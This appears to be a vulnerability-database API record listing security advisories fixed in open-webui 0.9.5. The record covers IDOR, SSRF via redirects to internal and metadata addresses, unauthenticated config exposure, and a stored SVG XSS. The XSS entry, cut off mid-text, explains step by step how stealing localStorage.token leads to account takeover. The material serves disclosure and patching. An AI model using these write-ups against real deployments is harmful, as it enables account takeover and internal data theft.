Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/375366?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/375366?format=api", "purl": "pkg:pypi/open-webui@0.9.5", "type": "pypi", "namespace": "", "name": "open-webui", "version": "0.9.5", "qualifiers": {}, "subpath": "", "is_vulnerable": false, "next_non_vulnerable_version": null, "latest_non_vulnerable_version": null, "affected_by_vulnerabilities": [], "fixing_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/69882?format=api", "vulnerability_id": "VCID-1g27-4vq6-7kdz", "summary": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, Pin/Unpin is a write operation (modifies the message's is_pinned , pinned_by, pinned_at fields), but in standard channels it only checks read permission, allowing users with read-only access to pin/unpin any message. This vulnerability is fixed in 0.9.5.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45386", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11183", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11159", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11216", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11225", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45386" }, { "reference_url": "https://github.com/open-webui/open-webui", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/open-webui/open-webui" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45386", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45386" }, { "reference_url": "https://github.com/advisories/GHSA-5gc6-xhv4-2wg6", "reference_id": "GHSA-5gc6-xhv4-2wg6", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5gc6-xhv4-2wg6" }, { "reference_url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-5gc6-xhv4-2wg6", "reference_id": "GHSA-5gc6-xhv4-2wg6", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-19T12:32:38Z/" } ], "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-5gc6-xhv4-2wg6" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/375366?format=api", "purl": "pkg:pypi/open-webui@0.9.5", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5" } ], "aliases": [ "CVE-2026-45386", "GHSA-5gc6-xhv4-2wg6" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1g27-4vq6-7kdz" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/69998?format=api", "vulnerability_id": "VCID-1tu1-b9de-nfaa", "summary": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, an IDOR vulnerability exists in the Channels feature of Open WebUI, allowing any channel member to modify messages sent by other members (including administrators) within the same channel. In the update_message_by_id function, for group or dm type channels, only the caller's membership in the channel is checked via the is_user_channel_member function, without verifying message ownership. This allows any channel member to modify messages sent by other members within the same channel. This vulnerability is fixed in 0.9.5.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45385", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11216", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11183", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11159", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11225", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45385" }, { "reference_url": "https://github.com/open-webui/open-webui", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/open-webui/open-webui" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45385", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45385" }, { "reference_url": "https://github.com/advisories/GHSA-wwhq-cx22-f7vv", "reference_id": "GHSA-wwhq-cx22-f7vv", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-wwhq-cx22-f7vv" }, { "reference_url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-wwhq-cx22-f7vv", "reference_id": "GHSA-wwhq-cx22-f7vv", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-18T15:56:23Z/" } ], "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-wwhq-cx22-f7vv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/375366?format=api", "purl": "pkg:pypi/open-webui@0.9.5", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5" } ], "aliases": [ "CVE-2026-45385", "GHSA-wwhq-cx22-f7vv" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1tu1-b9de-nfaa" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/69858?format=api", "vulnerability_id": "VCID-4v8w-kv6g-kkbc", "summary": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, multiple endpoints accept a user-supplied file_id and attach the referenced file to a resource the caller controls (folder knowledge, knowledge-base contents) without verifying that the caller owns or has been granted access to the file. The file's content then becomes reachable through the downstream RAG / file-content paths, allowing any authenticated user to exfiltrate any other user's private file — and on the knowledge-base path, also to overwrite it — given knowledge of the file's UUID. This affects backend/open_webui/routers/folders.py (POST /api/v1/folders/{id}/update), backend/open_webui/routers/knowledge.py (add_file_to_knowledge_by_id), and backend/open_webui/routers/knowledge.py (add_files_to_knowledge_by_id_batch). This vulnerability is fixed in 0.9.5.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45402", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01734", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.0172", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01726", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01723", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45402" }, { "reference_url": "https://github.com/open-webui/open-webui", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/open-webui/open-webui" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45402", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45402" }, { "reference_url": "https://github.com/advisories/GHSA-r472-mw7m-967f", "reference_id": "GHSA-r472-mw7m-967f", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-r472-mw7m-967f" }, { "reference_url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-r472-mw7m-967f", "reference_id": "GHSA-r472-mw7m-967f", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-15T22:17:20Z/" } ], "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-r472-mw7m-967f" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/375366?format=api", "purl": "pkg:pypi/open-webui@0.9.5", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5" } ], "aliases": [ "CVE-2026-45402", "GHSA-r472-mw7m-967f" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4v8w-kv6g-kkbc" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/69730?format=api", "vulnerability_id": "VCID-4x63-8x64-d3bq", "summary": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, a parsing difference between the urlparse and requests libraries led to an SSRF bypass vulnerability. This vulnerability is fixed in 0.9.5.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45400", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.10286", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.10269", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.10234", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.10283", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45400" }, { "reference_url": "https://github.com/open-webui/open-webui", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/open-webui/open-webui" }, { "reference_url": "https://github.com/open-webui/open-webui/releases/tag/v0.9.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/open-webui/open-webui/releases/tag/v0.9.0" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45400", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45400" }, { "reference_url": "https://github.com/advisories/GHSA-8w7q-q5jp-jvgx", "reference_id": "GHSA-8w7q-q5jp-jvgx", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-8w7q-q5jp-jvgx" }, { "reference_url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-8w7q-q5jp-jvgx", "reference_id": "GHSA-8w7q-q5jp-jvgx", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T21:07:46Z/" } ], "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-8w7q-q5jp-jvgx" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/375366?format=api", "purl": "pkg:pypi/open-webui@0.9.5", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5" } ], "aliases": [ "CVE-2026-45400", "GHSA-8w7q-q5jp-jvgx" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4x63-8x64-d3bq" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/70000?format=api", "vulnerability_id": "VCID-5jna-wvd7-j7cm", "summary": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, GET /api/v1/retrieval/ returns live RAG pipeline configuration to any unauthenticated HTTP client. No Authorization header, cookie, or API key is required. Every adjacent endpoint on the same router (/embedding, /config) is correctly guarded by get_admin_user making this a targeted omission. This vulnerability is fixed in 0.9.5.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45397", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.01075", "scoring_system": "epss", "scoring_elements": "0.78274", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.01075", "scoring_system": "epss", "scoring_elements": "0.78283", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.01075", "scoring_system": "epss", "scoring_elements": "0.78206", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.01075", "scoring_system": "epss", "scoring_elements": "0.78288", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45397" }, { "reference_url": "https://github.com/open-webui/open-webui", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/open-webui/open-webui" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45397", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45397" }, { "reference_url": "https://github.com/advisories/GHSA-65pg-qhhw-mxwg", "reference_id": "GHSA-65pg-qhhw-mxwg", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-65pg-qhhw-mxwg" }, { "reference_url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-65pg-qhhw-mxwg", "reference_id": "GHSA-65pg-qhhw-mxwg", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-18T14:34:06Z/" } ], "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-65pg-qhhw-mxwg" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/375366?format=api", "purl": "pkg:pypi/open-webui@0.9.5", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5" } ], "aliases": [ "CVE-2026-45397", "GHSA-65pg-qhhw-mxwg" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5jna-wvd7-j7cm" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/69906?format=api", "vulnerability_id": "VCID-cw4k-3s8z-uqh8", "summary": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, the validate_url() function in backend/open_webui/retrieval/web/utils.py only validates the initial URL submitted by the caller. The HTTP clients used downstream (sync requests, async aiohttp, langchain's WebBaseLoader) follow HTTP 3xx redirects by default and do not re-validate the redirect target against the private-IP / metadata-IP block list. Any authenticated user can therefore submit a public URL that 302-redirects to an internal address (e.g. 127.0.0.1, 169.254.169.254, RFC1918) and read the internal response body via the /api/v1/retrieval/process/web endpoint, the /api/v1/images/... endpoints, the /api/chat/completions endpoint with an image_url content part, and any other route that calls these helpers. This vulnerability is fixed in 0.9.5.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45401", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00039", "scoring_system": "epss", "scoring_elements": "0.12004", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00039", "scoring_system": "epss", "scoring_elements": "0.11932", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00039", "scoring_system": "epss", "scoring_elements": "0.12023", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00039", "scoring_system": "epss", "scoring_elements": "0.12025", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45401" }, { "reference_url": "https://github.com/open-webui/open-webui", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/open-webui/open-webui" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45401", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45401" }, { "reference_url": "https://github.com/advisories/GHSA-c6xv-rcvw-v685", "reference_id": "GHSA-c6xv-rcvw-v685", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-c6xv-rcvw-v685" }, { "reference_url": "https://github.com/advisories/GHSA-rh5x-h6pp-cjj6", "reference_id": "GHSA-rh5x-h6pp-cjj6", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-rh5x-h6pp-cjj6" }, { "reference_url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-rh5x-h6pp-cjj6", "reference_id": "GHSA-rh5x-h6pp-cjj6", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-18T12:47:48Z/" } ], "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-rh5x-h6pp-cjj6" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/375366?format=api", "purl": "pkg:pypi/open-webui@0.9.5", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5" } ], "aliases": [ "CVE-2026-45401", "GHSA-rh5x-h6pp-cjj6" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-cw4k-3s8z-uqh8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/70077?format=api", "vulnerability_id": "VCID-dzh3-rqx4-fqhv", "summary": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, _validate_collection_access() checks the user-memory-* and file-* collection name prefixes but does not check knowledge base collections, which use raw UUIDs as collection names. Any authenticated user who knows a private knowledge base UUID can read its content through the retrieval query endpoints, even though the knowledge API correctly denies that user access. The same gap affects the retrieval write endpoints (/process/text, /process/file, /process/files/batch, /process/web, /process/youtube), allowing an attacker to inject content into or overwrite another user's knowledge base. This vulnerability is fixed in 0.9.5.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45398", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13438", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13533", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13557", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.1356", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45398" }, { "reference_url": "https://github.com/open-webui/open-webui", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/open-webui/open-webui" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45398", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45398" }, { "reference_url": "https://github.com/open-webui/open-webui/pull/22109", "reference_id": "22109", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-18T16:01:45Z/" } ], "url": "https://github.com/open-webui/open-webui/pull/22109" }, { "reference_url": "https://github.com/advisories/GHSA-4g37-7p2c-38r9", "reference_id": "GHSA-4g37-7p2c-38r9", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4g37-7p2c-38r9" }, { "reference_url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-4g37-7p2c-38r9", "reference_id": "GHSA-4g37-7p2c-38r9", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-18T16:01:45Z/" } ], "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-4g37-7p2c-38r9" }, { "reference_url": "https://github.com/open-webui/open-webui/releases/tag/v0.9.5", "reference_id": "v0.9.5", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-18T16:01:45Z/" } ], "url": "https://github.com/open-webui/open-webui/releases/tag/v0.9.5" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/375366?format=api", "purl": "pkg:pypi/open-webui@0.9.5", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5" } ], "aliases": [ "CVE-2026-45398", "GHSA-4g37-7p2c-38r9" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-dzh3-rqx4-fqhv" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360431?format=api", "vulnerability_id": "VCID-ef1t-pxjm-j7cz", "summary": "Open WebUI vulnerable to stored XSS via OAuth picture claim stored as SVG data URI in profile_image_url\n# Summary\n\nWhen a user signs in via OAuth, Open WebUI fetches the `picture` claim URL, infers a MIME type from the URL extension via `mimetypes.guess_type`, and stores `data:<mime>;base64,...` as the user's profile image. The OAuth code path does not go through the `validate_profile_image_url` Pydantic validator that normally restricts profile images to PNG/JPEG/GIF/WebP. A `.svg` URL in the `picture` claim lands in the database as `data:image/svg+xml;base64,...`.\n\nThe profile image endpoint `GET /api/v1/users/{id}/profile/image` returns the stored data URI with the attacker-controlled MIME type as `Content-Type` and `Content-Disposition: inline`. Security headers (CSP, `X-Content-Type-Options`) are env-gated and not set by default. An authenticated user navigating directly to that URL gets the SVG as a top-level document, executing `<script>`/`onload` in the same origin and able to read `localStorage.token` → account takeover.\n\nSame class of trust-boundary error as CVE-2025-64496 (trust of untrusted model servers) and CVE-2025-64495 (rich-text XSS). Different sink, different code path.\n\n# Details\n\n## 1. MIME inferred from URL extension, not Content-Type\n\n`backend/open_webui/utils/oauth.py:1336-1345` — `_process_picture_url`:\n\n```python\nresponse = await client.get(picture_url, ...)\nif response.status_code == 200:\n picture = response.content\n base64_encoded_picture = base64.b64encode(picture).decode(\"utf-8\")\n guessed_mime_type = mimetypes.guess_type(picture_url)[0]\n if guessed_mime_type is None:\n guessed_mime_type = \"image/jpeg\"\n return f\"data:{guessed_mime_type};base64,{base64_encoded_picture}\"\n```\n\nNo MIME allowlist. The upstream `Content-Type` is ignored. For a URL ending in `.svg`, `mimetypes.guess_type` returns `image/svg+xml`.\n\n## 2. OAuth path bypasses the profile-image validator\n\n`backend/open_webui/utils/validate.py:10-36` defines `validate_profile_image_url`, which only accepts `/user.png`, `/user-mono.png`, and `data:image/{png,jpeg,gif,webp};base64,...`.\n\nThis validator is wired into Pydantic form models (`SignupForm`, `UpdateProfileForm`, `UserUpdateForm`), but the OAuth flow at `oauth.py:1536-1540` (existing-user login) and `oauth.py:1556-1574` 